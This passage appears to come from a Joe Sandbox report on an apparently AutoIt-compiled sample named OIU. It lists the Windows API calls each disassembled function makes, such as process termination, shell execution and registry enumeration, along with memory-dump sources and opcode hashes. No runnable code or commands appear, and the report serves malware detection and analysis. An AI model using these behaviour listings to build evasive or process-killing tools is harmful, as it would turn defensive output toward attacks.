                                                                      • Source File: 00000003.00000002.457876260.0000000000BA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00BA0000, based on PE: true
                                                                      • Associated: 00000003.00000002.457872449.0000000000BA0000.00000002.00000001.01000000.00000003.sdmp
                                                                      • Associated: 00000003.00000002.457891140.0000000000C3C000.00000002.00000001.01000000.00000003.sdmp
                                                                      • Associated: 00000003.00000002.457891140.0000000000C62000.00000002.00000001.01000000.00000003.sdmp
                                                                      • Associated: 00000003.00000002.457901097.0000000000C6C000.00000004.00000001.01000000.00000003.sdmp
                                                                      • Associated: 00000003.00000002.457904821.0000000000C74000.00000002.00000001.01000000.00000003.sdmp
                                                                      • Associated: 00000003.00000002.457904821.0000000000C84000.00000002.00000001.01000000.00000003.sdmp
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_3_2_ba0000_OIU.jbxd
                                                                      Similarity
                                                                      • API ID: Virtual
                                                                      • String ID:
                                                                      • API String ID: 4278518827-0
                                                                      • Opcode ID: 1e9ce2bd9a7790f6b6dfde947b681316539b74e35ec8a72bfeb2668823d89610
                                                                      • Instruction ID: 37a869a46f8b19288a6e39e61a6df53e70984358f0d6e0a265d208b73761cc0f
                                                                      • Opcode Fuzzy Hash: 1e9ce2bd9a7790f6b6dfde947b681316539b74e35ec8a72bfeb2668823d89610
                                                                      • Instruction Fuzzy Hash: 190144B0902B5ABDE3008F6A8C85B56FEA8FF19354F00411BA15C4BA42C7B5A864CBE5
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      APIs
                                                                      • PostMessageW.USER32 ref: 00C0EB30
                                                                      • SendMessageTimeoutW.USER32(?,00000010,00000000,00000000,00000002,000001F4,?), ref: 00C0EB46
                                                                      • GetWindowThreadProcessId.USER32(?,?), ref: 00C0EB55
                                                                      • OpenProcess.KERNEL32(001F0FFF,00000000,?,?,?,?,00000010,00000000,00000000,00000002,000001F4,?,?,00000010,00000000,00000000), ref: 00C0EB64
                                                                      • TerminateProcess.KERNEL32(00000000,00000000,?,?,?,00000010,00000000,00000000,00000002,000001F4,?,?,00000010,00000000,00000000), ref: 00C0EB6E
                                                                      • CloseHandle.KERNEL32(00000000), ref: 00C0EB75
                                                                      Memory Dump Source
                                                                      • Source File: 00000003.00000002.457876260.0000000000BA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00BA0000, based on PE: true
                                                                      • Associated: 00000003.00000002.457872449.0000000000BA0000.00000002.00000001.01000000.00000003.sdmp
                                                                      • Associated: 00000003.00000002.457891140.0000000000C3C000.00000002.00000001.01000000.00000003.sdmp
                                                                      • Associated: 00000003.00000002.457891140.0000000000C62000.00000002.00000001.01000000.00000003.sdmp
                                                                      • Associated: 00000003.00000002.457901097.0000000000C6C000.00000004.00000001.01000000.00000003.sdmp
                                                                      • Associated: 00000003.00000002.457904821.0000000000C74000.00000002.00000001.01000000.00000003.sdmp
                                                                      • Associated: 00000003.00000002.457904821.0000000000C84000.00000002.00000001.01000000.00000003.sdmp
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_3_2_ba0000_OIU.jbxd
                                                                      Similarity
                                                                      • API ID: Process$Message$CloseHandleOpenPostSendTerminateThreadTimeoutWindow
                                                                      • String ID:
                                                                      • API String ID: 839392675-0
                                                                      • Opcode ID: a50323e71dbe50948b936bff4ed548883b7de563834627df36d62bdec0c5aa89
                                                                      • Instruction ID: 6b629becbc261f123aa8f9cefd4dcd18feeb5ea25f3134323eecd1bff76f88c2
                                                                      • Opcode Fuzzy Hash: a50323e71dbe50948b936bff4ed548883b7de563834627df36d62bdec0c5aa89
                                                                      • Instruction Fuzzy Hash: 69F03A72250158BBE7215B629C8EFEF3A7CEFCAB11F004158F611E1091D7A05A01DBB5
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      APIs
                                                                      • GetClientRect.USER32 ref: 00BF7452
                                                                      • SendMessageW.USER32(?,00001328,00000000,?), ref: 00BF7469
                                                                      • GetWindowDC.USER32(?), ref: 00BF7475
                                                                      • GetPixel.GDI32(00000000,?,?), ref: 00BF7484
                                                                      • ReleaseDC.USER32(?,00000000), ref: 00BF7496
                                                                      • GetSysColor.USER32 ref: 00BF74B0
                                                                      Memory Dump Source
                                                                      • Source File: 00000003.00000002.457876260.0000000000BA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00BA0000, based on PE: true
                                                                      • Associated: 00000003.00000002.457872449.0000000000BA0000.00000002.00000001.01000000.00000003.sdmp
                                                                      • Associated: 00000003.00000002.457891140.0000000000C3C000.00000002.00000001.01000000.00000003.sdmp
                                                                      • Associated: 00000003.00000002.457891140.0000000000C62000.00000002.00000001.01000000.00000003.sdmp
                                                                      • Associated: 00000003.00000002.457901097.0000000000C6C000.00000004.00000001.01000000.00000003.sdmp
                                                                      • Associated: 00000003.00000002.457904821.0000000000C74000.00000002.00000001.01000000.00000003.sdmp
                                                                      • Associated: 00000003.00000002.457904821.0000000000C84000.00000002.00000001.01000000.00000003.sdmp
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_3_2_ba0000_OIU.jbxd
                                                                      Similarity
                                                                      • API ID: ClientColorMessagePixelRectReleaseSendWindow
                                                                      • String ID:
                                                                      • API String ID: 272304278-0
                                                                      • Opcode ID: 5e32bee735f654ad09df211eb6335d77ce95cd48a572e0c21815edac7c389e5f
                                                                      • Instruction ID: 4f6c9aa1bdf2eaab19c99ba33b6420cb25febf3572f637629be4b14b1d3c7ca0
                                                                      • Opcode Fuzzy Hash: 5e32bee735f654ad09df211eb6335d77ce95cd48a572e0c21815edac7c389e5f
                                                                      • Instruction Fuzzy Hash: FA014B31410619EFEB515F64DC49BBE7BB5FB04311F5501A4FA16A31A1CF311E51AB50
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      APIs
                                                                      • WaitForSingleObject.KERNEL32(?,000000FF), ref: 00C0187F
                                                                      • UnloadUserProfile.USERENV(?,?), ref: 00C0188B
                                                                      • CloseHandle.KERNEL32(?), ref: 00C01894
                                                                      • CloseHandle.KERNEL32(?), ref: 00C0189C
                                                                      • GetProcessHeap.KERNEL32(00000000,?), ref: 00C018A5
                                                                      • HeapFree.KERNEL32(00000000), ref: 00C018AC
                                                                      Memory Dump Source
                                                                      • Source File: 00000003.00000002.457876260.0000000000BA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00BA0000, based on PE: true
                                                                      • Associated: 00000003.00000002.457872449.0000000000BA0000.00000002.00000001.01000000.00000003.sdmp
                                                                      • Associated: 00000003.00000002.457891140.0000000000C3C000.00000002.00000001.01000000.00000003.sdmp
                                                                      • Associated: 00000003.00000002.457891140.0000000000C62000.00000002.00000001.01000000.00000003.sdmp
                                                                      • Associated: 00000003.00000002.457901097.0000000000C6C000.00000004.00000001.01000000.00000003.sdmp
                                                                      • Associated: 00000003.00000002.457904821.0000000000C74000.00000002.00000001.01000000.00000003.sdmp
                                                                      • Associated: 00000003.00000002.457904821.0000000000C84000.00000002.00000001.01000000.00000003.sdmp
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_3_2_ba0000_OIU.jbxd
                                                                      Similarity
                                                                      • API ID: CloseHandleHeap$FreeObjectProcessProfileSingleUnloadUserWait
                                                                      • String ID:
                                                                      • API String ID: 146765662-0
                                                                      • Opcode ID: 7a0476c533cd7de5e17986e327bd3b95fff389426f41493664f67c8e278e9927
                                                                      • Instruction ID: 7c59a94b981d715b6b436e904d3bb4aba61807102083d38a0b2149049fad765a
                                                                      • Opcode Fuzzy Hash: 7a0476c533cd7de5e17986e327bd3b95fff389426f41493664f67c8e278e9927
                                                                      • Instruction Fuzzy Hash: 01E0E536014101BBDB015FA1ED8CB4EBF39FF4AB22B108220F225A1070CB329430EF50
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      APIs
                                                                      • ShellExecuteExW.SHELL32(0000003C), ref: 00C2AEA3
                                                                        • Part of subcall function 00BA7620: _wcslen.LIBCMT ref: 00BA7625
                                                                      • GetProcessId.KERNEL32(00000000), ref: 00C2AF38
                                                                      • CloseHandle.KERNEL32(00000000), ref: 00C2AF67
                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 00000003.00000002.457876260.0000000000BA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00BA0000, based on PE: true
                                                                      • Associated: 00000003.00000002.457872449.0000000000BA0000.00000002.00000001.01000000.00000003.sdmp
                                                                      • Associated: 00000003.00000002.457891140.0000000000C3C000.00000002.00000001.01000000.00000003.sdmp
                                                                      • Associated: 00000003.00000002.457891140.0000000000C62000.00000002.00000001.01000000.00000003.sdmp
                                                                      • Associated: 00000003.00000002.457901097.0000000000C6C000.00000004.00000001.01000000.00000003.sdmp
                                                                      • Associated: 00000003.00000002.457904821.0000000000C74000.00000002.00000001.01000000.00000003.sdmp
                                                                      • Associated: 00000003.00000002.457904821.0000000000C84000.00000002.00000001.01000000.00000003.sdmp
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_3_2_ba0000_OIU.jbxd
                                                                      Similarity
                                                                      • API ID: CloseExecuteHandleProcessShell_wcslen
                                                                      • String ID: <$@
                                                                      • API String ID: 146682121-1426351568
                                                                      • Opcode ID: d0855c595828f6e5b9960082dd3d0902dd9b79ca3ab18e01d97f7186cb058095
                                                                      • Instruction ID: 4086162e5bf82a8461742fb08f8f28c3fbe2088d1d29fd31bd7d58eddcfcf7e5
                                                                      • Opcode Fuzzy Hash: d0855c595828f6e5b9960082dd3d0902dd9b79ca3ab18e01d97f7186cb058095
                                                                      • Instruction Fuzzy Hash: 2C71AE71A04625DFCB14EF94D494A9EBBF0FF09310F048499E826AB762CB74EE45CB91
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      APIs
                                                                      • CoCreateInstance.OLE32(?,00000000,00000005,?,?), ref: 00C07206
                                                                      • SetErrorMode.KERNEL32(00000001,?,?,?,?,?,?,?,?,?), ref: 00C0723C
                                                                      • GetProcAddress.KERNEL32(?,DllGetClassObject,?,?,?,?,?,?,?,?,?), ref: 00C0724D
                                                                      • SetErrorMode.KERNEL32(00000000,?,?,?,?,?,?,?,?,?), ref: 00C072CF
                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 00000003.00000002.457876260.0000000000BA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00BA0000, based on PE: true
                                                                      • Associated: 00000003.00000002.457872449.0000000000BA0000.00000002.00000001.01000000.00000003.sdmp
                                                                      • Associated: 00000003.00000002.457891140.0000000000C3C000.00000002.00000001.01000000.00000003.sdmp
                                                                      • Associated: 00000003.00000002.457891140.0000000000C62000.00000002.00000001.01000000.00000003.sdmp
                                                                      • Associated: 00000003.00000002.457901097.0000000000C6C000.00000004.00000001.01000000.00000003.sdmp
                                                                      • Associated: 00000003.00000002.457904821.0000000000C74000.00000002.00000001.01000000.00000003.sdmp
                                                                      • Associated: 00000003.00000002.457904821.0000000000C84000.00000002.00000001.01000000.00000003.sdmp
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_3_2_ba0000_OIU.jbxd
                                                                      Similarity
                                                                      • API ID: ErrorMode$AddressCreateInstanceProc
                                                                      • String ID: DllGetClassObject
                                                                      • API String ID: 753597075-1075368562
                                                                      • Opcode ID: a7d255914085328a2418eddea6c0310545fa79e5be122808232f56a83a747e41
                                                                      • Instruction ID: f0c755907e4e39e46cde0a21008a9c601967225d72c2a026262a477fcfb4607b
                                                                      • Opcode Fuzzy Hash: a7d255914085328a2418eddea6c0310545fa79e5be122808232f56a83a747e41
                                                                      • Instruction Fuzzy Hash: 32418EB1A04204EFDF19CF54C984B9A7BA9EF44310F1581A9BD059F28AD7B0EE40DBA0
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      APIs
                                                                      • SendMessageW.USER32(00000000,00000467,00000000,?), ref: 00C32F8D
                                                                      • LoadLibraryW.KERNEL32(?), ref: 00C32F94
                                                                      • SendMessageW.USER32(?,00000467,00000000,00000000), ref: 00C32FA9
                                                                      • DestroyWindow.USER32 ref: 00C32FB1
                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 00000003.00000002.457876260.0000000000BA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00BA0000, based on PE: true
                                                                      • Associated: 00000003.00000002.457872449.0000000000BA0000.00000002.00000001.01000000.00000003.sdmp
                                                                      • Associated: 00000003.00000002.457891140.0000000000C3C000.00000002.00000001.01000000.00000003.sdmp
                                                                      • Associated: 00000003.00000002.457891140.0000000000C62000.00000002.00000001.01000000.00000003.sdmp
                                                                      • Associated: 00000003.00000002.457901097.0000000000C6C000.00000004.00000001.01000000.00000003.sdmp
                                                                      • Associated: 00000003.00000002.457904821.0000000000C74000.00000002.00000001.01000000.00000003.sdmp
                                                                      • Associated: 00000003.00000002.457904821.0000000000C84000.00000002.00000001.01000000.00000003.sdmp
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_3_2_ba0000_OIU.jbxd
                                                                      Similarity
                                                                      • API ID: MessageSend$DestroyLibraryLoadWindow
                                                                      • String ID: SysAnimate32
                                                                      • API String ID: 3529120543-1011021900
                                                                      • Opcode ID: 389bc1b42b49ac70c795032b17e80794cfacfdf76cf5d7fe0ecf970ae245fc68
                                                                      • Instruction ID: 5582d86e00d19c700a595a23e761959cf1f5dbccf4dc4e314e90c0ffe2e9f19a
                                                                      • Opcode Fuzzy Hash: 389bc1b42b49ac70c795032b17e80794cfacfdf76cf5d7fe0ecf970ae245fc68
                                                                      • Instruction Fuzzy Hash: A321AC72224225ABEF205FA4DC81FBB77B9EB5D364F100628FA60E2190D771DC919760
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      APIs
                                                                      • GetModuleHandleExW.KERNEL32(00000000,mscoree.dll,00000000,?,?,?,00BC4D1E,00BD28E9,?,00BC4CBE,00BD28E9,00C688B8,0000000C,00BC4E15,00BD28E9,00000002), ref: 00BC4D8D
                                                                      • GetProcAddress.KERNEL32(00000000,CorExitProcess,00000000,?,?,?,00BC4D1E,00BD28E9,?,00BC4CBE,00BD28E9,00C688B8,0000000C,00BC4E15,00BD28E9,00000002), ref: 00BC4DA0
                                                                      • FreeLibrary.KERNEL32(00000000,?,?,?,00BC4D1E,00BD28E9,?,00BC4CBE,00BD28E9,00C688B8,0000000C,00BC4E15,00BD28E9,00000002,00000000), ref: 00BC4DC3
                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 00000003.00000002.457876260.0000000000BA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00BA0000, based on PE: true
                                                                      • Associated: 00000003.00000002.457872449.0000000000BA0000.00000002.00000001.01000000.00000003.sdmp
                                                                      • Associated: 00000003.00000002.457891140.0000000000C3C000.00000002.00000001.01000000.00000003.sdmp
                                                                      • Associated: 00000003.00000002.457891140.0000000000C62000.00000002.00000001.01000000.00000003.sdmp
                                                                      • Associated: 00000003.00000002.457901097.0000000000C6C000.00000004.00000001.01000000.00000003.sdmp
                                                                      • Associated: 00000003.00000002.457904821.0000000000C74000.00000002.00000001.01000000.00000003.sdmp
                                                                      • Associated: 00000003.00000002.457904821.0000000000C84000.00000002.00000001.01000000.00000003.sdmp
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_3_2_ba0000_OIU.jbxd
                                                                      Similarity
                                                                      • API ID: AddressFreeHandleLibraryModuleProc
                                                                      • String ID: CorExitProcess$mscoree.dll
                                                                      • API String ID: 4061214504-1276376045
                                                                      • Opcode ID: 2219bc8adec29cc25ff25690942328fa031ef0c2c16ce0ceb5f1a09e2febf9c2
                                                                      • Instruction ID: b423a1b96d8f2b2ce2444d8c4d0b6a3e84d4c3ce742370259c408c06eb50dad5
                                                                      • Opcode Fuzzy Hash: 2219bc8adec29cc25ff25690942328fa031ef0c2c16ce0ceb5f1a09e2febf9c2
                                                                      • Instruction Fuzzy Hash: 69F04F35A50208BBDB11AF90DC89FAEBBF5EF44751F0001A8F906A2260CB705E40DF91
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      APIs
                                                                      • LoadLibraryA.KERNEL32(kernel32.dll), ref: 00BA4E9C
                                                                      • GetProcAddress.KERNEL32(00000000,Wow64DisableWow64FsRedirection,?,?,00BA4EDD,?,00C71418,00000001,>>>AUTOIT NO CMDEXECUTE<<<,?,?,?,00000000), ref: 00BA4EAE
                                                                      • FreeLibrary.KERNEL32(00000000,?,?,00BA4EDD,?,00C71418,00000001,>>>AUTOIT NO CMDEXECUTE<<<,?,?,?,00000000), ref: 00BA4EC0
                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 00000003.00000002.457876260.0000000000BA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00BA0000, based on PE: true
                                                                      • Associated: 00000003.00000002.457872449.0000000000BA0000.00000002.00000001.01000000.00000003.sdmp
                                                                      • Associated: 00000003.00000002.457891140.0000000000C3C000.00000002.00000001.01000000.00000003.sdmp
                                                                      • Associated: 00000003.00000002.457891140.0000000000C62000.00000002.00000001.01000000.00000003.sdmp
                                                                      • Associated: 00000003.00000002.457901097.0000000000C6C000.00000004.00000001.01000000.00000003.sdmp
                                                                      • Associated: 00000003.00000002.457904821.0000000000C74000.00000002.00000001.01000000.00000003.sdmp
                                                                      • Associated: 00000003.00000002.457904821.0000000000C84000.00000002.00000001.01000000.00000003.sdmp
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_3_2_ba0000_OIU.jbxd
                                                                      Similarity
                                                                      • API ID: Library$AddressFreeLoadProc
                                                                      • String ID: Wow64DisableWow64FsRedirection$kernel32.dll
                                                                      • API String ID: 145871493-3689287502
                                                                      • Opcode ID: ac9024a8dcc0339ce89c417eb619e88cd9040311c84faa0b6383224f6e97d24a
                                                                      • Instruction ID: df97ec569fb9e49a3ffe69c765931d9b82328b6738db0bfd3f14d4879247aea4
                                                                      • Opcode Fuzzy Hash: ac9024a8dcc0339ce89c417eb619e88cd9040311c84faa0b6383224f6e97d24a
                                                                      • Instruction Fuzzy Hash: 6AE0C236A166225BD2321B25BC58B6FB698EFC3F63B050165FC01F3200DBE0CD0296E0
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      APIs
                                                                      • LoadLibraryA.KERNEL32(kernel32.dll), ref: 00BA4E62
                                                                      • GetProcAddress.KERNEL32(00000000,Wow64RevertWow64FsRedirection,?,?,00BE3CDE,?,00C71418,00000001,>>>AUTOIT NO CMDEXECUTE<<<,?,?,?,00000000), ref: 00BA4E74
                                                                      • FreeLibrary.KERNEL32(00000000,?,?,00BE3CDE,?,00C71418,00000001,>>>AUTOIT NO CMDEXECUTE<<<,?,?,?,00000000), ref: 00BA4E87
                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 00000003.00000002.457876260.0000000000BA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00BA0000, based on PE: true
                                                                      • Associated: 00000003.00000002.457872449.0000000000BA0000.00000002.00000001.01000000.00000003.sdmp
                                                                      • Associated: 00000003.00000002.457891140.0000000000C3C000.00000002.00000001.01000000.00000003.sdmp
                                                                      • Associated: 00000003.00000002.457891140.0000000000C62000.00000002.00000001.01000000.00000003.sdmp
                                                                      • Associated: 00000003.00000002.457901097.0000000000C6C000.00000004.00000001.01000000.00000003.sdmp
                                                                      • Associated: 00000003.00000002.457904821.0000000000C74000.00000002.00000001.01000000.00000003.sdmp
                                                                      • Associated: 00000003.00000002.457904821.0000000000C84000.00000002.00000001.01000000.00000003.sdmp
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_3_2_ba0000_OIU.jbxd
                                                                      Similarity
                                                                      • API ID: Library$AddressFreeLoadProc
                                                                      • String ID: Wow64RevertWow64FsRedirection$kernel32.dll
                                                                      • API String ID: 145871493-1355242751
                                                                      • Opcode ID: e9620ecb38303c9d0eec66c53eaf18c57479239925123cb45bd47c91805ef39a
                                                                      • Instruction ID: f2a1e799a9c1f0c618d615254cec66e12739eeef8beb83322db0e0582b45dcd2
                                                                      • Opcode Fuzzy Hash: e9620ecb38303c9d0eec66c53eaf18c57479239925123cb45bd47c91805ef39a
                                                                      • Instruction Fuzzy Hash: 4CD0C2365166215746321B247C48F8F7A98EFC2B113050161B801F2110CFA0CD0296D0
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      APIs
                                                                      • GetCurrentProcessId.KERNEL32 ref: 00C2A427
                                                                      • OpenProcess.KERNEL32(00000410,00000000,00000000), ref: 00C2A435
                                                                      • GetProcessIoCounters.KERNEL32(00000000,?), ref: 00C2A468
                                                                      • CloseHandle.KERNEL32(?), ref: 00C2A63D
                                                                      Memory Dump Source
                                                                      • Source File: 00000003.00000002.457876260.0000000000BA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00BA0000, based on PE: true
                                                                      • Associated: 00000003.00000002.457872449.0000000000BA0000.00000002.00000001.01000000.00000003.sdmp
                                                                      • Associated: 00000003.00000002.457891140.0000000000C3C000.00000002.00000001.01000000.00000003.sdmp
                                                                      • Associated: 00000003.00000002.457891140.0000000000C62000.00000002.00000001.01000000.00000003.sdmp
                                                                      • Associated: 00000003.00000002.457901097.0000000000C6C000.00000004.00000001.01000000.00000003.sdmp
                                                                      • Associated: 00000003.00000002.457904821.0000000000C74000.00000002.00000001.01000000.00000003.sdmp
                                                                      • Associated: 00000003.00000002.457904821.0000000000C84000.00000002.00000001.01000000.00000003.sdmp
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_3_2_ba0000_OIU.jbxd
                                                                      Similarity
                                                                      • API ID: Process$CloseCountersCurrentHandleOpen
                                                                      • String ID:
                                                                      • API String ID: 3488606520-0
                                                                      • Opcode ID: 4c74d1513bf2f82e7deccda05caed68875178bceb610894083697bfcc52f4930
                                                                      • Instruction ID: 65c3ef6b10499b54b3c50abc484ca55d19446cfbec2e76529a1b7d4e84aa5f07
                                                                      • Opcode Fuzzy Hash: 4c74d1513bf2f82e7deccda05caed68875178bceb610894083697bfcc52f4930
                                                                      • Instruction Fuzzy Hash: 42A1C071604300AFD720EF24D882F2AB7E1AF84714F14885DF56A9B792DBB1ED41CB82
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      APIs
                                                                      • GetTimeZoneInformation.KERNEL32(?,00000000,00000000,00000000,?,00C43700), ref: 00BDBB91
                                                                      • WideCharToMultiByte.KERNEL32(00000000,00000000,00C7121C,000000FF,00000000,0000003F,00000000,?,?), ref: 00BDBC09
                                                                      • WideCharToMultiByte.KERNEL32(00000000,00000000,00C71270,000000FF,?,0000003F,00000000,?), ref: 00BDBC36
                                                                      • _free.LIBCMT ref: 00BDBB7F
                                                                        • Part of subcall function 00BD29C8: HeapFree.KERNEL32(00000000,00000000), ref: 00BD29DE
                                                                        • Part of subcall function 00BD29C8: GetLastError.KERNEL32(00000000,?,00BDD7D1,00000000,00000000,00000000,00000000,?,00BDD7F8,00000000,00000007,00000000,?,00BDDBF5,00000000,00000000), ref: 00BD29F0
                                                                      • _free.LIBCMT ref: 00BDBD4B
                                                                      Memory Dump Source
                                                                      • Source File: 00000003.00000002.457876260.0000000000BA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00BA0000, based on PE: true
                                                                      • Associated: 00000003.00000002.457872449.0000000000BA0000.00000002.00000001.01000000.00000003.sdmp
                                                                      • Associated: 00000003.00000002.457891140.0000000000C3C000.00000002.00000001.01000000.00000003.sdmp
                                                                      • Associated: 00000003.00000002.457891140.0000000000C62000.00000002.00000001.01000000.00000003.sdmp
                                                                      • Associated: 00000003.00000002.457901097.0000000000C6C000.00000004.00000001.01000000.00000003.sdmp
                                                                      • Associated: 00000003.00000002.457904821.0000000000C74000.00000002.00000001.01000000.00000003.sdmp
                                                                      • Associated: 00000003.00000002.457904821.0000000000C84000.00000002.00000001.01000000.00000003.sdmp
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_3_2_ba0000_OIU.jbxd
                                                                      Similarity
                                                                      • API ID: ByteCharMultiWide_free$ErrorFreeHeapInformationLastTimeZone
                                                                      • String ID:
                                                                      • API String ID: 1286116820-0
                                                                      • Opcode ID: 0ae9526a324be5ee17c3e3c0135b7007021383460eb1fbc49fb57b7989f49946
                                                                      • Instruction ID: 42f9f33a9b06a000ba71df321c878b18575ea0397b4816ec2e255f654a7d8d76
                                                                      • Opcode Fuzzy Hash: 0ae9526a324be5ee17c3e3c0135b7007021383460eb1fbc49fb57b7989f49946
                                                                      • Instruction Fuzzy Hash: 7B518371900209EFCB14EF699C81EAEF7F8EB44360B1542ABE554D73A1FB709E419B50
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      APIs
                                                                        • Part of subcall function 00C0DDE0: GetFullPathNameW.KERNEL32(00000000,00007FFF,?,?,?,?,?,?,00C0CF22,?), ref: 00C0DDFD
                                                                        • Part of subcall function 00C0DDE0: GetFullPathNameW.KERNEL32(?,00007FFF,?,?,?,?,?,00C0CF22,?), ref: 00C0DE16
                                                                        • Part of subcall function 00C0E199: GetFileAttributesW.KERNEL32(?,00C0CF95), ref: 00C0E19A
                                                                      • lstrcmpiW.KERNEL32(?,?), ref: 00C0E473
                                                                      • MoveFileW.KERNEL32 ref: 00C0E4AC
                                                                      • _wcslen.LIBCMT ref: 00C0E5EB
                                                                      • _wcslen.LIBCMT ref: 00C0E603
                                                                      • SHFileOperationW.SHELL32 ref: 00C0E650
                                                                      Memory Dump Source
                                                                      • Source File: 00000003.00000002.457876260.0000000000BA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00BA0000, based on PE: true
                                                                      • Associated: 00000003.00000002.457872449.0000000000BA0000.00000002.00000001.01000000.00000003.sdmp
                                                                      • Associated: 00000003.00000002.457891140.0000000000C3C000.00000002.00000001.01000000.00000003.sdmp
                                                                      • Associated: 00000003.00000002.457891140.0000000000C62000.00000002.00000001.01000000.00000003.sdmp
                                                                      • Associated: 00000003.00000002.457901097.0000000000C6C000.00000004.00000001.01000000.00000003.sdmp
                                                                      • Associated: 00000003.00000002.457904821.0000000000C74000.00000002.00000001.01000000.00000003.sdmp
                                                                      • Associated: 00000003.00000002.457904821.0000000000C84000.00000002.00000001.01000000.00000003.sdmp
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_3_2_ba0000_OIU.jbxd
                                                                      Similarity
                                                                      • API ID: File$FullNamePath_wcslen$AttributesMoveOperationlstrcmpi
                                                                      • String ID:
                                                                      • API String ID: 3183298772-0
                                                                      • Opcode ID: f177c16cb1ae0a02e39134d0052ffe3077d9bee107c263cb732cf43d8635a908
                                                                      • Instruction ID: 3dd351c89d4c3fda18f6d7394e5d80f4f6795570a7ccf22735d4cf112026ac24
                                                                      • Opcode Fuzzy Hash: f177c16cb1ae0a02e39134d0052ffe3077d9bee107c263cb732cf43d8635a908
                                                                      • Instruction Fuzzy Hash: 405161B24483459BC724EB90DC81ADFB3ECAF85340F00491EF69993191EF75A688CB66
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      APIs
                                                                        • Part of subcall function 00BA9CB3: _wcslen.LIBCMT ref: 00BA9CBD
                                                                        • Part of subcall function 00C2C998: CharUpperBuffW.USER32(?,?), ref: 00C2C9B5
                                                                        • Part of subcall function 00C2C998: _wcslen.LIBCMT ref: 00C2C9F1
                                                                        • Part of subcall function 00C2C998: _wcslen.LIBCMT ref: 00C2CA68
                                                                        • Part of subcall function 00C2C998: _wcslen.LIBCMT ref: 00C2CA9E
                                                                      • RegConnectRegistryW.ADVAPI32(?,?,?), ref: 00C2BAA5
                                                                      • RegOpenKeyExW.ADVAPI32 ref: 00C2BB00
                                                                      • RegEnumKeyExW.ADVAPI32(?,-00000001,?,?,00000000,00000000,00000000,?), ref: 00C2BB63
                                                                      • RegCloseKey.ADVAPI32(?), ref: 00C2BBA6
                                                                      • RegCloseKey.ADVAPI32(00000000), ref: 00C2BBB3
                                                                      Memory Dump Source
                                                                      • Source File: 00000003.00000002.457876260.0000000000BA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00BA0000, based on PE: true
                                                                      • Associated: 00000003.00000002.457872449.0000000000BA0000.00000002.00000001.01000000.00000003.sdmp
                                                                      • Associated: 00000003.00000002.457891140.0000000000C3C000.00000002.00000001.01000000.00000003.sdmp
                                                                      • Associated: 00000003.00000002.457891140.0000000000C62000.00000002.00000001.01000000.00000003.sdmp
                                                                      • Associated: 00000003.00000002.457901097.0000000000C6C000.00000004.00000001.01000000.00000003.sdmp
                                                                      • Associated: 00000003.00000002.457904821.0000000000C74000.00000002.00000001.01000000.00000003.sdmp
                                                                      • Associated: 00000003.00000002.457904821.0000000000C84000.00000002.00000001.01000000.00000003.sdmp
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_3_2_ba0000_OIU.jbxd
                                                                      Similarity
                                                                      • API ID: _wcslen$Close$BuffCharConnectEnumOpenRegistryUpper
                                                                      • String ID:
                                                                      • API String ID: 826366716-0
                                                                      • Opcode ID: c2c3986cadbe19886f8fe7be5b75b12ec0412cfde9d5819c326c055fd302acb7
                                                                      • Instruction ID: 23510d5d3c1d72c88e8ddd57f4af192083a82c15327f6b1d5a28919e3149d27c
                                                                      • Opcode Fuzzy Hash: c2c3986cadbe19886f8fe7be5b75b12ec0412cfde9d5819c326c055fd302acb7
                                                                      • Instruction Fuzzy Hash: 1361B031208241EFC314DF14D490E2ABBE5FF85348F1485ACF49A8B6A2DB31ED45DB92
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

